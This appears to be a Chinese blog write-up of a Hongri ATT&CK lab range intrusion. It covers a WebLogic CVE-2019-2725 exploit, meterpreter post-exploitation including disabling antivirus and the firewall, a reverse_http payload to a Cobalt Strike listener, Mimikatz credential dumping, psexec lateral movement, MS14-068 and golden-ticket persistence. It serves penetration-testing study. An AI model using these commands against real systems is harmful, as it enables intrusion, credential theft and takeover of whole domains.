freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

ATT&CK 实战分享(二)
GODUNTONG 2021-08-28 17:05:57 141818

声明:

本文仅供学习网络安全行业的朋友们参考,同时是记录自己成长的随笔记录,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,我们将不承担任何法律及连带责任。

一、环境搭建

1.环境搭建测试

红日靶场地址

1.1 网络所示

在这里插入图片描述开启Weblogic服务 watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMzIzNzYz,size_16,color_FFFFFF,t_70

2.信息收集

2.1 信息收集

## 端口扫描
root@kali:~# nmap -A -sV 192.168.111.80

1630141260_6129fb4c6b02e0bdb63be.png!small?16301412606641630141281_6129fb61d76433c87662e.png!small?1630141282172

二、漏洞探测与提权

1、漏洞利用

1.1 弱口令

Weblogic登录界面:http://192.168.111.80:7001/console/login/LoginForm.jsp

常用弱口令:
system/password
system/security
weblogic/weblogic
admin/security
wlcsystem/wlcsystem
wlpisystem/wlpisystem

1.2 Weblogic漏洞扫描

利用Weblogic漏洞扫描脚本,如下(仅保留成功结果),观察WEB主机时发现某60一直报拦截。 脚本地址:https://github.com/0xn0ne/weblogicScanner

root@kali:~/weblogicScanner-master/weblogicScanner-master# python3 ws.py -t 192.168.111.80
[16:53:02][INFO] [+][Weblogic Console][192.168.111.80:7001] Found module!
[16:53:02][INFO] [+][CVE-2014-4210][192.168.111.80:7001] Found module!
[16:53:16][INFO] [+][CVE-2017-3506][192.168.111.80:7001] Exists vulnerability!
[16:53:16][INFO] [+][CVE-2017-10271][192.168.111.80:7001] Exists vulnerability!
[16:53:28][INFO] [+][CVE-2018-3191][192.168.111.80:7001] Exists vulnerability!
[16:53:28][INFO] [+][CVE-2018-3245][192.168.111.80:7001] Exists vulnerability!
[16:53:38][INFO] [+][CVE-2019-2618][192.168.111.80:7001] Found module!
[16:53:43][INFO] [+][CVE-2019-2725][192.168.111.80:7001] Exists vulnerability!
[16:53:51][INFO] [+][CVE-2019-2729][192.168.111.80:7001] Exists vulnerability!
[16:53:53][INFO] [+][CVE-2019-2888][192.168.111.80:7001] Found module!
[16:53:56][INFO] [+][CVE-2020-2551][192.168.111.80:7001] Found module!
[16:54:09][INFO] [+][CVE-2020-2883][192.168.111.80:7001] Exists vulnerability!
[16:54:14][INFO] [+][CVE-2020-14882][192.168.111.80:7001] Exists vulnerability!

1.2.1 CVE-2019-2725

尝试利用Kali中模块multi/misc/weblogic_deserialize_asyncresponseservice1630141298_6129fb722e91dada63d9f.png!small?1630141298443

2、提权

## 隐藏进程pid
meterpreter > getpid
meterpreter > run post/windows/manage/migrate

1630141306_6129fb7a5e5d8413271e6.png!small?1630141306546管理员权限先用着继续收集信息,派生shell到CS在尝试提权。1630141338_6129fb9a040e71507eed5.png!small?1630141338201

3、继续收集信息

## 查看补丁信息。
meterpreter > run post/windows/gather/enum_patches
## 查看安装程序,发现某60。
meterpreter > run post/windows/gather/enum_applications
## 查看进程
meterpreter > ps
## 杀死防护软件
meterpreter > run post/windows/manage/killav

4、派生Cobalt Strike

msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.111.128
msf6 exploit(windows/local/payload_inject) > set lport 8081
msf6 exploit(windows/local/payload_inject) > set session 1
msf6 exploit(windows/local/payload_inject) > run

1630141348_6129fba47e85eb37f704b.png!small?1630141349000

4.1 获取主机凭证

Run Mimikatz获取密码、hash等,这里获取到用户mssql的密码。1630141354_6129fbaac55c2427f7c08.png!small?1630141355059

4.2 提权

1630141360_6129fbb0ca48fe5f13dd8.png!small?1630141361305

三、内网渗透

1、域内信息收集

## 查看域控      
net group "domain controllers" /domain
## 查看域管理员  
net group "domain admins" /domain  
##查询域内用户  
net user /domain

## 域控:10.10.10.10(DE1AY.COM)
## 成员主机:10.10.10.201
## 关闭防火墙
netsh advfirewall set allprofiles state off

1630141376_6129fbc078bca396f9a0d.png!small?1630141376686

## 域内主机端口信息

1630141384_6129fbc85798646c0f9da.png!small?1630141384643

2、横向移动

2.1 psexec

提权后,我们可以用mimikatz dump目标机的凭证,并进行内网横向移动,扫描端口发现开启445端口,尝试SMB Beacon管道通讯。 新建一个Beacon SMB监听器1630141397_6129fbd5032b58f57b7d4.png!small?1630141397274psexec横向移动1630141405_6129fbddd2c9cfa72ad53.png!small?1630141406212DC(10.10.10.10)和PC(10.10.10.201)上线1630141414_6129fbe663dbca505e059.png!small?1630141414742

3、域漏洞利用

3.1 MS14-068

如果前面获取是的普通用户mssql的密码,我们尝试可以登陆域控,但权限明显不够,分析补丁信息(对应补丁为KB3011780)并未发现MS14-068的补丁,便可以利用该漏洞。

beacon> shell dir \\10.10.10.10\c$

1630141425_6129fbf14274a13ad1351.png!small?1630141425464

## 注入票据时需要清空当前机器中所有凭证,如果有域成员凭证会影响
beacon> mimikatz kerberos::list
beacon> mimikatz kerberos::purge
beacon> mimikatz kerberos::list
beacon> shell C:\bea\MS14-068.exe -u mssql@DE1AY.COM -p 1qaz@WSX -s S-1-5-21-2756371121-2868759905-3853650604-2103 -d 10.10.10.10
beacon> mimikatz kerberos::ptc C:\Oracle\Middleware\user_projects\domains\base_domain\TGT_mssql@de1ay.com.ccache

1630141437_6129fbfd90b8f3eb36238.png!small?1630141437880测试访问,成功。1630141445_6129fc050509d449e7b1b.png!small?1630141445263

4、权限维持

4.1 黄金票据

## 获得krbtgt账户的hash
82dfc71b72a11ef37d663047bc2088fb
## 获得普通用户mssql的SID
S-1-5-21-2756371121-2868759905-3853650604-2103

1630141455_6129fc0f8ff05aa30763b.png!small?1630141455889选择生成黄金票据1630141460_6129fc14c1c1a2ae260e6.png!small?1630141461088成功1630141468_6129fc1c2a9eb9f99d22f.png!small?1630141468461

四、拓展总结

感兴趣的读者可以根据下面的思路学习实战复现,不懂的地方就去找去学习,相信自己会收获的。

1、Bypass UAC

2、Windows系统NTLM获取(理论知识:Windows认证)

3、Access Token利用(MSSQL利用)

4、WMI利用

5、网页代理,二层代理,特殊协议代理(DNS,ICMP)

6、域内信息收集

7、域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用

8、域凭证收集

9、后门技术(黄金票据/白银票据/Sid History/MOF)

# web安全 # 内网渗透
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 GODUNTONG 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
ATT & CK 实战系列
GODUNTONG LV.2
这家伙太懒了,还未填写个人描述!
  • 4 文章数
  • 15 关注者
ATT&CK 实战分享(三)
2021-08-28
ATT & CK 实战分享(一)
2021-08-28
邮件安全之浅析订阅类邮件
2021-08-05
文章目录